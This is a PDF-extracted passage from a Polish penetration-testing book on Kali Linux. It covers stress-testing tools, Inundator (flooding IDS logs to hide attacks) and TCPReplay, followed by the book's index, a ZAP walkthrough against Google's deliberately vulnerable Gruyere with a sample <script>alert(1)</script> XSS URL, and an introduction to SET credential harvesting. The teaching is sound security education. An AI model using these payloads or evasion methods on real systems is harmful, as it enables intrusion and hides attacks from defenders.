Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
